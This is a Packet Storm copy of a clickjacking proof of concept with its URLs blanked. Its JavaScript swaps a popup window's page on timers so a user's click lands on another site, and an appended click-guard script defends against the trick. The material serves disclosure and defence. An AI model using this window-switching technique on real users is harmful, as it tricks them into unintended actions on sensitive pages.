ClickIt Proof Of Concept

Type packetstorm
Reporter Michal Zalewski
Modified 2011-12-13T00:00:00


<h3><i>X-Frame-Options</i> is worth less than you think</h3>
<script>
var w;
var dummy;
var it;

// Precache stuff. (Image URLs are empty in this copy.)
x = new Image();
x.src = '';
x2 = new Image();
x2.src = '';
x3 = new Image();
x3.src = '';
x4 = new Image();
x4.src = '';

// Runs when the button at the bottom of the page is clicked.
function prepare() {
  w = open('', '_blank');
  setTimeout(complete, 300);
}

function complete() {
  w.location.href = '';
  setTimeout(goback, 1000);
}

// Polls the opened window every 100 ms until reading its document throws.
function goback() {
  try {
    if (w.document.body.innerHTML == undefined) throw 1;
    setTimeout(goback, 100);
  } catch (e) {
    // That one case where prompts.tab_modal.enabled=true would have helped in Firefox...
    if (navigator.userAgent.indexOf('Firefox/') != -1)
      setTimeout('w.location.href = ""', 1500);
    setTimeout('w.location.href = ""', 500);
  }
}
</script>

JavaScript allows you to exploit human cognitive abilities to a remarkable extent; tools such as
window positioning, <code>history.forward()</code> and <code>history.back()</code> open some
scary possibilities that we are <a href="">completely unprepared to deal with</a>.

This proof-of-concept aims to demonstrate this; while it is intentionally crude and makes no real effort to
conceal its operation, the transitions <a href="">can be made seamless</a> and very
difficult to perceive. Very accurate click prediction can be achieved by carefully measuring
mouse velocity and distance to destination, too.

I discuss these attacks and many other unsolved challenges in web app design in
<i><a href="">"The Tangled Web"</a></i>.

A similar approach poses a problem with many browser UIs; for that,
<a href="">check out this post</a>.

<input type=submit value="Click here to play a game" onclick="prepare()">
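
The PoC above drives a top-level window rather than a frame, so X-Frame-Options on the target page never comes into play. As an added example (not part of the original PoC; the function names, the `data-sensitive` attribute and the 1000 ms threshold are assumptions), the sensitive page can ignore clicks until it has been visible and focused for a minimum time:

```javascript
// Added defensive example; names and thresholds are assumptions, not from the PoC.

// Pure timing logic, with an injectable clock so it can be exercised offline.
function createClickGuard(minStableMs, now = Date.now) {
  let shownAt = null; // null while the page is hidden, unfocused or not yet shown

  return {
    // Call whenever the page (re)appears: load, history navigation, tab or window focus.
    shown() { shownAt = now(); },
    // Call when the page loses visibility or focus.
    hidden() { shownAt = null; },
    // True only once the page has been continuously in front of the user long enough.
    allow() { return shownAt !== null && now() - shownAt >= minStableMs; },
  };
}

// Browser wiring: protects every element marked data-sensitive (hypothetical attribute).
function installClickGuard(win, minStableMs = 1000) {
  const doc = win.document;
  const guard = createClickGuard(minStableMs);
  const refresh = () =>
    (doc.visibilityState === 'visible' && doc.hasFocus()) ? guard.shown() : guard.hidden();

  // pageshow also fires when the page is restored by history.back()/history.forward().
  win.addEventListener('pageshow', refresh);
  win.addEventListener('focus', refresh);
  win.addEventListener('blur', () => guard.hidden());
  doc.addEventListener('visibilitychange', refresh);

  // Capture phase, so the check runs before the element's own click handlers.
  doc.addEventListener('click', (ev) => {
    const target = ev.target.closest && ev.target.closest('[data-sensitive]');
    if (target && !guard.allow()) {
      ev.preventDefault();            // blocks form submission / link activation
      ev.stopImmediatePropagation();  // blocks later click handlers
    }
  }, true);

  refresh(); // start the timer for the initial load
  return guard;
}

if (typeof window !== 'undefined') installClickGuard(window);
```

The delay trades a short wait on legitimate first clicks for resistance to a page switch timed just before the user's click; the server should still require confirmation for destructive actions.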